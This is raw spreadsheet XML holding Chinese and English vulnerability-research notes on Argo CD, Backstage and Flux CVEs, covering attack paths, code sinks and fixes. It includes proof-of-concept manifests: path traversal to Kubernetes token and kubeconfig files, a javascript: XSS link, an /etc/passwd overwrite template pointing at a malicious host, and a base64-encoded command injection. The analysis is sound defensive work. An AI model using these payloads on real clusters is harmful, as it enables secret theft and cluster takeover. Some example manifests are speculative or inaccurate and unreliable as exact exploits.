      <t xml:space="preserve">使用Helm类型应用
漏洞触发点位于Helm Chart处理逻辑（helmTemplate函数），攻击需利用包含valueFiles字段的Helm应用。
Helm Chart需满足基础格式要求（如有效Chart.yaml），以通过Argo CD的初步校验。
4. </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">路径混淆机制生效
url.ParseRequestURI()误判本地绝对路径为URI，例如：
yaml
helm:
  valueFiles:
    - /var/run/secrets/kubernetes.io/serviceaccount/token  # 被误判为URI
该路径需满足：
格式为绝对路径（以/开头）；
目标文件为有效YAML格式（否则解析失败）；
路径指向argocd-reposerver Pod内的敏感文件（如Kubernetes Secrets、其他应用配置）。
5. </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>文件系统隔离不足
argocd-reposerver未启用强隔离机制（如每应用独立文件沙箱）；
敏感文件存储位置可预测（如默认挂载的Secret路径、其他应用的values.yaml）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">https://apiiro.com/blog/malicious-kubernetes-helm-charts-can-be-used-to-steal-sensitive-information-from-argo-cd-deployments/
 1..敏感信息泄露
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">目标文件：
Kubernetes Secrets（如/var/run/secrets/kubernetes.io/serviceaccount/token）；
其他应用的明文配置文件（如数据库凭证）；
系统敏感文件（如/etc/passwd）。
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">攻击步骤：
提交包含恶意valueFiles路径的Helm Chart至仓库；
Argo CD同步时触发helmTemplate逻辑；
url.ParseRequestURI()误判路径为URI，跳过EnforceToCurrentRoot()检查；
读取目标文件内容并解析为YAML参数，通过Argo CD API或UI泄露。
2. </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">横向移动与权限提升
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">场景延伸：
窃取集群管理员Token，通过kubectl接管集群；
读取其他应用的values.yaml，获取数据库连接字符串等敏感信息；
利用泄露的SSH密钥访问内部系统。
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">利用链示例：
mermaid
graph TD
    A[提交恶意Chart] --&gt; B[绕过路径检查]
    B --&gt; C[读取ServiceAccount Token]
    C --&gt; D[通过kubectl执行任意命令]
    D --&gt; E[部署恶意Pod或窃取数据]
3. </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">供应链攻击
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">污染公共Helm仓库：
攻击者上传包含恶意valueFiles的Chart至公共仓库（如Artifact Hub），诱导用户部署。
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">后果：
所有使用该Chart的Argo CD实例自动同步后，敏感数据将泄露至攻击者控制的端点
</t>
    </r>
  </si>
  <si>
    <t>多场景验证校验混淆</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>存在验证
但存在以下2个问题：
1. URI解析逻辑与文件路径的混淆
路径解析逻辑中：url.ParseRequestURI() 函数被用于判断valueFiles输入是否为URI。根据其官方文档特性，该函数会将绝对路径格式的本地文件路径</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">（如/etc/passwd）误判为合法的HTTP请求URI,当攻击者构造形如/absolute/path/to/sensitive.yaml的路径时，该函数返回nil错误，导致代码分支跳过关键的EnforceToCurrentRoot()路径安全校验
2.文件隔离机制的失效
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">EnforceToCurrentRoot 逻辑缺陷
该函数本应强制路径位于repoRoot目录内，但其校验逻辑存在两个漏洞：
go
func isRequestedDirUnderCurrentRoot(currentRoot, requestedPath string) bool {
    return strings.HasPrefix(requestedPath, currentRoot)  // 仅简单前缀匹配
}
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">路径规范化不足：未正确处理../等相对路径符号，例如当currentRoot=/app时，攻击者可通过/app/../../etc/passwd绕过检查。
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">绝对路径覆盖：当requestedPath为绝对路径时（如/etc/passwd），strings.HasPrefix校验会直接失败，但后续代码未对此类情况做拦截
</t>
    </r>
  </si>
  <si>
    <t>sink点涉及跨组件：
Application Controller 
：processAppRefreshQueueItem(synchandler) -&gt;CompareAppState-&gt; targetObjs, manifestInfo, err = m.getRepoObjs(app, source, appLabelKey, revision, noCache, noRevisionCache, verifySignature, project)-&gt;
manifestInfo, err := repoClient.GenerateManifest
cli 命令行工具：
-&gt; Application Server( gRP请求）
MethodName: "GetManifests",
   Handler:    _ApplicationService_GetManifests_Handler,
以下调用相同
    → Repo Server (gRPC 请求)
 MethodName: "GenerateManifest",
            Handler:    _RepoServerService_GenerateManifest_Handler,
 func (s *Service) GenerateManifest-&gt;func (s *Service) runManifestGen-&gt; GenerateManifests-&gt;helmTemplate（check的位置)-&gt;     out, err := h.Template(templateOpts)-》 h.cmd.template(".", templateOpts)-&gt;c.run(args...)-&gt;
cmd := exec.Command(c.binaryName, args...)
(命令执行）</t>
  </si>
  <si>
    <t xml:space="preserve">
Argo CD是一款基于声明式GitOps理念的Kubernetes持续交付工具。自1.5.0版本起至2.1.11、2.2.6和2.3.0之前版本的Argo CD存在路径遍历漏洞，允许具备读写权限的恶意用户从repo-server组件中泄露敏感文件。拥有Application资源"create"或"update"权限的攻击者可通过构造恶意Helm chart并将其部署于Application中，从生成的清单文件或错误信息中获取repo-server上任意文本文件内容。攻击者需预知或猜测目标文件路径。可能泄露的敏感文件包括其他Application的源码仓库文件，以及被挂载为repo-server文件系统的密钥信息。该漏洞已在2.1.11、2.2.6和2.3.0版本中修复。缓解措施包括：避免在git中存储密钥、避免将密钥挂载为repo-server文件、避免将解密后的密钥写入repo-server文件系统，以及严格限制具有Application创建/更新权限的账户范围。</t>
  </si>
  <si>
    <t>**攻击面/影响范围**：  
   - 所有使用Argo CD且未限制Application CRUD权限的集群  
   - Repo-server上挂载的Secrets或其他敏感文件（如kubeconfig、TLS证书）</t>
  </si>
  <si>
    <t>**攻击方式**：  
   - 攻击者创建/更新Application，利用恶意Helm Chart的`values`文件路径遍历（如`../../secrets/token`）  
   - Repo-server渲染Chart时读取目标文件，内容出现在生成的Manifest或错误日志中</t>
  </si>
  <si>
    <t>apiVersion: argoproj.io/v1alpha1
   kind: Application
   metadata:
     name: malicious-app
   spec:
     source:
       repoURL: "https://malicious-repo.example.com"
       path: "traversal-chart"
       helm:
         valueFiles:
         - "../../../../etc/kubernetes/admin.conf"  # 路径遍历泄露敏感文件
     destination:
       server: "https://kubernetes.default.svc"
       namespace: default</t>
  </si>
  <si>
    <t>Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Argo CD starting with version 1.5.0 but before versions 2.1.11, 2.2.6, and 2.3.0 is vulnerable to a path traversal vulnerability, allowing a malicious user with read/write access to leak sensitive files from Argo CD's repo-server. A malicious Argo CD user who has been granted `create` or `update` access to Applications can leak the contents of any text file on the repo-server. By crafting a malicious Helm chart and using it in an Application, the attacker can retrieve the sensitive file's contents either as part of the generated manifests or in an error message. The attacker would have to know or guess the location of the target file. Sensitive files which could be leaked include files from another Application's source repositories or any secrets which have been mounted as files on the repo-server. This vulnerability is patched in Argo CD versions 2.1.11, 2.2.6, and 2.3.0. The problem can be mitigated by avoiding storing secrets in git, avoiding mounting secrets as files on the repo-server, avoiding decrypting secrets into files on the repo-server, and carefully limiting who can `create` or `update` Applications.</t>
  </si>
  <si>
    <t xml:space="preserve">增加check
完善校验规则
</t>
  </si>
  <si>
    <t xml:space="preserve">
Argo CD是一款面向Kubernetes的声明式GitOps持续交付工具。自v2.6.0-rc1起始的所有版本存在输出清理错误，导致错误消息中泄露仓库访问凭证。这些错误消息对用户可见且会被记录到日志中。当用户通过Argo CD API（以及对应的UI或CLI）尝试创建或更新Application时可能触发该错误消息的显示。用户必须拥有`applications, create`或`applications, update`的RBAC权限才能访问可能生成错误的相关代码路径。用户无法保证能直接触发错误消息，但可能通过向API发送大量请求来触发上游仓库的速率限制错误。若用户拥有`repositories, update`权限，可通过编辑现有仓库的URL拼写错误等方式强制生成错误消息。但拥有该级别权限的用户通常已具备访问凭证的合法权限。该漏洞已在2.6.1版本中修复，建议用户升级。目前暂无已知的变通方案。</t>
  </si>
  <si>
    <t>**攻击面/影响范围**：  
   - 具有`applications/create`或`applications/update` RBAC权限的用户  
   - 攻击者可利用Argo CD UI/CLI/API触发错误日志泄露凭证</t>
  </si>
  <si>
    <t>**攻击利用方式**：  
   - 攻击者提交包含非法仓库URL的`Application`配置，例如：  
     ```yaml
     apiVersion: argoproj.io/v1alpha1
     kind: Application
     spec:
       source:
         repoURL: "https://invalid-repo.example.com"  # 故意配置错误URL
         targetRevision: HEAD
         credentials:  # 关联敏感凭据
           username: admin
           password: s3cret
     ```
   - 通过高频API请求触发仓库连接错误，从错误日志/UI响应中提取明文凭据</t>
  </si>
  <si>
    <t>Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. All versions of Argo CD starting with v2.6.0-rc1 have an output sanitization bug which leaks repository access credentials in error messages. These error messages are visible to the user, and they are logged. The error message is visible when a user attempts to create or update an Application via the Argo CD API (and therefor the UI or CLI). The user must have `applications, create` or `applications, update` RBAC access to reach the code which may produce the error. The user is not guaranteed to be able to trigger the error message. They may attempt to spam the API with requests to trigger a rate limit error from the upstream repository. If the user has `repositories, update` access, they may edit an existing repository to introduce a URL typo or otherwise force an error message. But if they have that level of access, they are probably intended to have access to the credentials anyway. A patch for this vulnerability has been released in version 2.6.1. Users are advised to upgrade. There are no known workarounds for this vulnerability.
- 在错误信息中泄露仓库访问凭证
- 这些错误信息对用户可见
- 错误信息会被记录到日志中</t>
  </si>
  <si>
    <t>CVE-2022-31035</t>
  </si>
  <si>
    <t xml:space="preserve">
Argo CD是一款面向Kubernetes的声明式GitOps持续交付工具。自v1.0.0起的所有版本均存在跨站脚本攻击（XSS）漏洞，允许恶意用户在界面中注入`javascript:`链接。当受害者用户点击该链接时，脚本将以受害者的权限（最高可达管理员级别）执行。该脚本可执行任何通过界面或API实现的操作，例如创建、修改和删除Kubernetes资源。此漏洞已在以下Argo CD版本发布补丁：v2.4.1、v2.3.5、v2.2.10和v2.1.16。除升级外没有完全安全的缓解措施。</t>
  </si>
  <si>
    <t>**攻击面或影响范围**  
   - 攻击面：Argo CD的Web UI用户（需受害者点击恶意链接）。  
   - 影响范围：所有未升级的Argo CD实例（v1.0.0及以上版本）。</t>
  </si>
  <si>
    <t>**攻击者利用方式**  
   - 攻击者构造包含`javascript:`链接的恶意内容（如应用名称、描述字段）。  
   - 受害者点击后，脚本以受害者权限调用Argo CD API，进而操作Kubernetes资源（如删除`Deployment`、窃取`Secret`）。</t>
  </si>
  <si>
    <t>deployment.annotation
link.argocd.argoproj.io/external-link
攻击示例：
apiVersion: apps/v1
kind: Deployment
metadata:
  annotations:
    link.argocd.argoproj.io/external-link: "javascript:alert(1337)"
  name: vulnerable-deployment
spec:
  # ... 部署配置</t>
  </si>
  <si>
    <t>External URLs for Deployments can include javascript：All unpatched versions of Argo CD starting with v1.0.0 are vulnerable to a cross-site scripting (XSS) bug allowing a malicious user to inject a javascript: link in the UI. When clicked by a victim user, the script will execute with the victim's permissions (up to and including admin).
The script would be capable of doing anything which is possible in the UI or via the API, such as creating, modifying, and deleting Kubernetes resources.</t>
  </si>
  <si>
    <t>步骤 1：注入恶意链接
- 攻击者修改 Deployment 配置
- 添加特定注解：link.argocd.argoproj.io/external-link
- 设置恶意 JavaScript URL，如：javascript:alert(1337)
步骤 2：等待同步
- Argo CD 同步配置
- 在仪表板上生成可点击的图标
- 所有有权访问的用户都能看到该链接
步骤 3：触发攻击
- 受害者访问 Argo CD 仪表板
- 点击外部链接图标
- 触发 XSS 攻击执行恶意 JavaScript
ada logic 2022安全审计报告有详细信息：ADA-ARGO-SA-02: XSS: External URLs for Deployments can
include javascript</t>
  </si>
  <si>
    <t>加check
a) URL 验证：
   - 检查 URL 格式是否有效
   - 禁止危险的协议（javascript:, data:）
   - 支持相对 URL 验证
b) 错误处理：
   - 使用自定义错误类型
   - 优雅处理无效 URL
   - 防止错误导致整体功能失效
c) 安全机制：
   - 构造时强制验证
   - 失败时抛出异常
   - 隔离无效输入</t>
  </si>
  <si>
    <t>CVE-2021-43783</t>
  </si>
  <si>
    <t xml:space="preserve">
@backstage/plugin-scaffolder-backend 是默认 Backstage 软件模板的后端组件。在受影响版本中，具有脚手架模板写权限的攻击者可通过操纵模板将文件写入脚手架后端主机实例的任意路径。在某些场景下，该漏洞也可通过执行模板时的用户输入进行利用，这意味着攻击者无需具备模板的写权限。但此方式无法控制注入文件的内容，除非模板本身以特定方式构建使其能够控制文件内容。该漏洞已在 `@backstage/plugin-scaffolder-backend` 的 `0.15.14` 版本中修复。建议通过限制访问权限并要求在注册或修改脚手架模板时进行审查来缓解此攻击。</t>
  </si>
  <si>
    <t>**攻击面或影响范围**：  
   - 攻击面：使用Backstage且启用了Scaffolder模板的集群管理平台  
   - 影响范围：Scaffolder-backend所在宿主机的文件系统，可能间接影响Kubernetes集群（例如通过篡改kubeconfig文件）</t>
  </si>
  <si>
    <t>**攻击者利用方式**：  
   - 通过构造恶意模板参数（如`destination`路径），利用模板执行时的路径遍历漏洞向宿主机写入任意文件（如`../../etc/cni/net.d`）  
   - 若模板允许用户控制文件内容（如通过参数注入），可能进一步植入恶意配置</t>
  </si>
  <si>
    <t xml:space="preserve">template crd+location crd
注册恶意模板
↓
模板被系统接受
↓
触发模板执行
↓
文件被写入任意路径
---
template crd:
apiVersion: scaffolder.backstage.io/v1beta3
kind: Template
metadata:
  name: malicious-template
  description: "A template for demonstration"
spec:
  owner: default/team
  type: service
  steps:
    - id: fetch
      name: Fetch Files
      action: fetch:template
      input:
        url: ./template
        values:
          dest: "../../../../etc/passwd"  # 路径遍历攻击
    - id: write
      name: Write Files
      action: fs:write
      input:
        path: "{{steps.fetch.output.dest}}"  # 引用遍历路径
        contents: |
          malicious content
---
location crd:
apiVersion: backstage.io/v1alpha1
kind: Location
metadata:
  name: malicious-location
spec:
  type: url
  target: http://malicious-host/templates  # 指向恶意模板源
</t>
  </si>
  <si>
    <t>@backstage/plugin-scaffolder-backend is the backend for the default Backstage software templates. In affected versions a malicious actor with write access to a registered scaffolder template is able to manipulate the template in a way that writes files to arbitrary paths on the scaffolder-backend host instance. This vulnerability can in some situation also be exploited through user input when executing a template, meaning you do not need write access to the templates. This method will not allow the attacker to control the contents of the injected file however, unless the template is also crafted in a specific way that gives control of the file contents. This vulnerability is fixed in version `0.15.14` of the `@backstage/plugin-scaffolder-backend`. This attack is mitigated by restricting access and requiring reviews when registering or modifying scaffolder templates.
（控制templates)</t>
  </si>
  <si>
    <t xml:space="preserve">
Backstage 是一款用于构建开发者门户的开源平台。Backstage scaffolder-backend 插件使用的模板库需要沙箱隔离机制，因其设计上允许代码注入。此前该插件采用 `vm2` 作为沙箱库，但鉴于该库存在多个历史漏洞及当前可能无法修复的现存漏洞，插件现已切换至其他沙箱库。拥有已注册脚手架模板写入权限的恶意攻击者可通过操纵模板实现 scaffolder-backend 实例上的远程代码执行。此漏洞仅可通过模板 YAML 定义本身进行利用，无法通过用户输入数据触发。该漏洞已在 `@backstage/plugin-scaffolder-backend` 1.15.0 版本中修复。</t>
  </si>
  <si>
    <t>**攻击面或影响范围**：  
   - 使用Backstage且未升级`@backstage/plugin-scaffolder-backend`到1.15.0的Kubernetes集群（若Backstage部署在集群内）。攻击者需有模板写入权限。</t>
  </si>
  <si>
    <t>**攻击者利用方式**：  
   - 在Backstage模板中注入恶意代码（如通过`vm2`沙箱逃逸），控制运行`scaffolder-backend`的Pod，进而可能攻击集群其他资源。</t>
  </si>
  <si>
    <t># 恶意模板示例
apiVersion: scaffolder.backstage.io/v1beta3
kind: Template
metadata:
  name: malicious-template
spec:
  steps:
    - id: exploit
      action: custom
      input:
        # 包含可逃逸 vm2 沙箱的代码
        code: |
          // 恶意代码，利用 vm2 漏洞
          # 可能导致远程代码执行</t>
  </si>
  <si>
    <t>这个漏洞是由于依赖的第三方库（vm2）的安全问题导致的
- 使用 vm2 作为模板沙箱库
- vm2 存在多个已知漏洞
- 可能导致沙箱逃逸
- 允许在模板中执行任意代码</t>
  </si>
  <si>
    <t>v1.15.0
https://github.com/backstage/backstage/commit/fb7375507d56faedcb7bb3665480070593c8949a</t>
  </si>
  <si>
    <t>sink点在不安全的第三方库中： vm2
- 使用 vm2 作为模板沙箱库
- vm2 存在多个已知漏洞
- 可能导致沙箱逃逸
- 允许在模板中执行任意代码
-&gt; 不确定具体的关键操作函数
关键点：
- vm2 沙箱的安全限制被绕过
- 模板执行环境被突破
- 代码在宿主系统执行</t>
  </si>
  <si>
    <t xml:space="preserve">
Backstage是一个用于构建开发者门户的开源平台。受影响版本中存在恶意攻击者可读取运行Scaffolder任务环境中的敏感文件的漏洞。攻击通过构造包含`github:publish:pull-request`操作和特定源路径的自定义Scaffolder模板实施，当模板执行时，敏感文件将被包含在发布的拉取请求中。该漏洞的缓解因素在于攻击者需要具备在Backstage目录中创建和注册模板的权限，且由于数据外泄通过拉取请求进行，该攻击非常明显。此漏洞已在`@backstage/plugin-scaffolder-backend`的`0.15.9`版本中修复。</t>
  </si>
  <si>
    <t>**漏洞攻击面或影响范围**  
   - 攻击面：使用Backstage Scaffolder的开发者门户  
   - 影响范围：允许恶意用户注册模板的环境，可能泄露Scaffolder Task运行环境中的敏感文件（如Kubernetes Secret挂载的文件）</t>
  </si>
  <si>
    <t>**攻击者利用方式**  
   1. 攻击者需在Backstage中注册恶意模板  
   2. 模板使用`github:publish:pull-request`动作并构造特殊源路径（路径遍历）  
   3. 执行模板时，敏感文件（如`/var/run/secrets/kubernetes.io/serviceaccount/token`）被包含在生成的PR中</t>
  </si>
  <si>
    <t>CVE-2021-41254</t>
  </si>
  <si>
    <t xml:space="preserve">
kustomize-controller 是一款 Kubernetes 运营商，专门用于运行针对 Kubernetes 清单定义并通过 Kustomize 组装的基建及工作负载的持续交付流水线。能够创建 Kubernetes Secret、Service Account 和 Flux Kustomization 对象的用户可通过将 Shell 脚本嵌入 Kubernetes Secret 的方式在 kustomize-controller 容器内执行命令。该漏洞可被用于通过 kustomize-controller 的 Service Account 执行 kubectl 命令，从而使得经过认证的 Kubernetes 用户获得集群管理员权限。受影响版本中，允许非管理员用户创建 Flux Kustomization 对象的多租户环境会受此问题影响。该漏洞已在 2021 年 10 月 8 日发布的 kustomize-controller v0.15.0（包含于 flux2 v0.18.0）中修复。自 v0.15 版本起，kustomize-controller 不再在容器操作系统上执行 shell 命令，且容器镜像中已移除 kubectl 二进制文件。为防止租户所属命名空间中创建包含 secrets 的 Kubernetes Service Account，可使用 Gatekeeper OPA 或 Kyverno 等 Kubernetes 验证 Webhook 进行防护。</t>
  </si>
  <si>
    <t>**攻击面/影响范围**：  
   多租户集群中，允许非管理员用户创建`Kustomization`、`Secret`、`ServiceAccount`的环境。</t>
  </si>
  <si>
    <t>**攻击利用方式**：  
   - 创建包含恶意Shell脚本的`Secret`，关联到`Kustomization`资源。
   - `kustomize-controller`在处理时执行脚本，利用其高权限ServiceAccount（如`cluster-admin`）执行`kubectl`命令。</t>
  </si>
  <si>
    <t>Kustomization
涉及3个资源
资源注入点在secret资源
字段：
apiVersion: v1
kind: Secret
metadata:
  name: exploit-token
  namespace: default
type: Opaque
data:
  # 注入命令的字段（base64编码）
  token: "IHx8IGt1YmVjdGwgYXBpLXZlcnNpb25z"  # " || kubectl api-versions" 的 base64编码
这个 Secret 会被 ServiceAccount 引用，并最终被 kustomize-controller 以高权限执行。</t>
  </si>
  <si>
    <t>apiVersion: v1
   kind: Secret
   metadata:
     name: malicious-secret
   type: Opaque
   data:
     script.sh: "IyEvYmluL3NoCmt1YmVjdGwgY3JlYXRlIG5zIGV2aWwtbmFtZXNwYWNl" # Base64编码的恶意脚本（如创建namespace）
   ---
   apiVersion: kustomize.toolkit.fluxcd.io/v1beta1
   kind: Kustomization
   metadata:
     name: exploit
   spec:
     path: ./  # 触发控制器处理包含恶意Secret的路径
     sourceRef:
       kind: GitRepository
       name: example-repo</t>
  </si>
  <si>
    <t xml:space="preserve"> - 通过 Secret 中的 token 字符串注入命令
- 利用 kustomize-controller 的权限执行命令
- 可以提升到集群管理员权限
漏洞特点：
- 利用资源链接实现注入
- 跨越多个资源类型
- 利用控制器的高权限
- 影响集群安全 
adalogic 2021:Issue 1: Arbitrary command execution via
command injection in the kustomize controller
by way of secrets( ADA-FLUX-21-01)
其他： 可用于说明哪些字段可用于注入，哪些字段不可用于注入</t>
  </si>
  <si>
    <t>v0.15.0
2021.11.12 发布： GHSA-35rf-v2jv-gfg7
https://github.com/fluxcd/kustomize-controller/pull/426（直接更新reconciler)</t>
  </si>
  <si>
    <t>校验责任变化-复杂的资源引用关系</t>
  </si>
  <si>
    <t xml:space="preserve">命令执行-&gt; 命令构造（fmt.sprintf)
命令注入链：
Secret (命令注入) 
↓
ServiceAccount (引用 Secret)
↓
Kustomization (使用 ServiceAccount)
↓
kustomize-controller 执行命令
// 命令执行点应该在负责执行 kustomize build 或处理资源的代码中
// 可能在以下位置：
- 处理 Secret token 的位置
- 执行外部命令的组件
- shell 命令执行的包装器
https://github.com/fluxcd/kustomize-controller/blob/v0.14.1/controllers/kustomization_controller.go
saToken, err := imp.GetServiceAccountToken(ctx
cmd = fmt.Sprintf("%s --token %s", cmd, saToken)
command := exec.CommandContext(applyCtx, "/bin/sh", "-c", cmd)
外部函数：func (r *KustomizationReconciler) apply(ctx context.Context, kustomization kustomizev1.Kustomization, imp *KustomizeImpersonation, dirPath string) (string, error) 
和
func (r *KustomizationReconciler) validate(ctx context.Context, kustomization kustomizev1.Kustomization, imp *KustomizeImpersonation, dirPath string) error {
</t>
  </si>
  <si>
    <t>包装函数validate 和apply在执行错误后会返回特定的错误类型：
kustomizev1.KustomizationNotReady
1. 使用结构化错误返回、错误上下文丰富
2. 遵循控制器场景： 错误会反应在资源状态中</t>
  </si>
  <si>
    <t xml:space="preserve">准入控制插件：
 prevent the creation of Kubernetes Service Accounts with `secrets` in namespaces owned by tenants, a Kubernetes validation webhook such as Gatekeeper OPA or Kyverno can be used.
- 阻止在租户命名空间创建带 secrets 的 ServiceAccount
- 切断攻击链的关键环节
- 防止权限提升攻击
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: restrict-sa
spec:
  validationFailureAction: enforce
  background: false
  rules:
    - name: validate-sa
      match:
        resources:
          kinds:
            - ServiceAccount
          namespaces:
            - tenant1
            - tenant2
        subjects:
          - kind: User
            name: some@tenant1.com
          - kind: User
            name: some@tenant2.com
          - kind: ServiceAccount
            name: kustomize-controller
            namespace: flux-system
          - kind: ServiceAccount
            name: helm-controller
            namespace: flux-system
      validate:
        message: "Invalid service account"
        pattern:
          X(secrets): "*?"
</t>
  </si>
  <si>
    <t>更改sink点-&gt;
在 kustomize-controller v0.15.0 中：
- 移除了执行 shell 命令的功能
- 从容器镜像中移除了 kubectl 二进制文件</t>
  </si>
  <si>
    <t>CVE-2022-39272</t>
  </si>
  <si>
    <t xml:space="preserve">
Flux是一款面向Kubernetes的开放式可扩展持续交付解决方案。0.35.0之前版本存在拒绝服务漏洞，具备修改Flux对象权限的用户（通过Flux源或直接在集群中操作）可向`.spec.interval`或`.spec.timeout`字段（及其结构化变体）注入无效数据，导致整个对象类型停止被处理。该漏洞已在0.35.0版本中修复。临时缓解方案可通过准入控制器限制`.spec.interval`和`.spec.timeout`字段的可用数值，但建议仍应升级至最新版本作为最终修复措施。</t>
  </si>
  <si>
    <t>**攻击面/影响范围**：  
   - 攻击者需具备权限修改Flux资源（通过集群内直接操作或注入恶意Git仓库清单）  
   - 影响所有使用Flux且版本&lt;0.35.0的集群，导致特定资源类型处理中断。</t>
  </si>
  <si>
    <t>**利用方式与攻击过程**：  
   - 攻击者创建/更新包含无效`interval`或`timeout`的Flux资源  
   - Flux控制器（如`source-controller`）因无法解析字段值触发panic，停止处理该类型所有资源  
   - 持续触发可导致控制器崩溃循环，破坏GitOps流程。</t>
  </si>
  <si>
    <t>apiVersion: source.toolkit.fluxcd.io/v1beta2
     kind: GitRepository
     spec:
       interval: "invalid_value"  # 例如非持续时间字符串（"10x"）或负值（"-10s"）
       url: https://github.com/example/repo
       ref:
         branch: main</t>
  </si>
  <si>
    <t xml:space="preserve"> - Duration 类型不兼容导致的问题：
  Kubernetes metav1.Duration &lt;-&gt; Go time.Duration
- 缺乏对时间字段的值验证
类型解析和序列化不一致
Go类型 -&gt; CRD -&gt; CustomResource -&gt; API校验 -&gt; etcd存储 -&gt; 反序列化 -&gt; Go类型
问题本质：
// API 服务器使用 strfmt.ParseDuration
// 允许解析：d (天) 和 w (周)
strfmt.ParseDuration("1w")  // 有效
// 反序列化时使用 time.ParseDuration
// 只支持：ns, us, ms, s, m, h
time.ParseDuration("1w")    // 报错
a) CRD 定义：声明使用 time.ParseDuration
b) API 服务器：实际使用 strfmt.ParseDuration
c) 反序列化：使用 time.ParseDuration
导致：
- API 服务器接受 'd' 和 'w' 单位
- 但反序列化时无法处理这些单位</t>
  </si>
  <si>
    <t>Flux is an open and extensible continuous delivery solution for Kubernetes. Versions prior to 0.35.0 are subject to a Denial of Service. Users that have permissions to change Flux’s objects, either through a Flux source or directly within a cluster, can provide invalid data to fields `.spec.interval` or `.spec.timeout` (and structured variations of these fields), causing the entire object type to stop being processed. This issue is patched in version 0.35.0. As a workaround, Admission controllers can be employed to restrict the values that can be used for fields `.spec.interval` and `.spec.timeout`, however upgrading to the latest versions is still the recommended mitigation.</t>
  </si>
  <si>
    <t xml:space="preserve">metav1.Duration 
type Duration struct {
 time.Duration `protobuf:"varint,1,opt,name=duration,casttype=time.Duration"`
}
</t>
  </si>
  <si>
    <t xml:space="preserve"> Duration 类型不兼容导致的问题：
  Kubernetes metav1.Duration &lt;-&gt; Go time.Duration
影响控制器的配置（时间间隔配置）
// 可能的 sink 点位置：
// 1. Duration 解析处理
func parseDuration(d metav1.Duration) (time.Duration, error) {
    // 这里尝试将 metav1.Duration 转换为 time.Duration
}
// 2. 控制器的 Reconcile 循环
func (r *Reconciler) Reconcile(ctx context.Context, req ctrl.Request) (ctrl.Result, error) {
    // 读取和处理时间字段
    if err := r.Get(ctx, req.NamespacedName, &amp;resource); err != nil {
        return ctrl.Result{}, err
    }
    // 使用 interval/timeout 值
}
// 3. 定时器/计时器设置
func setReconcileTimer(interval metav1.Duration) {
    // 设置调谐间隔
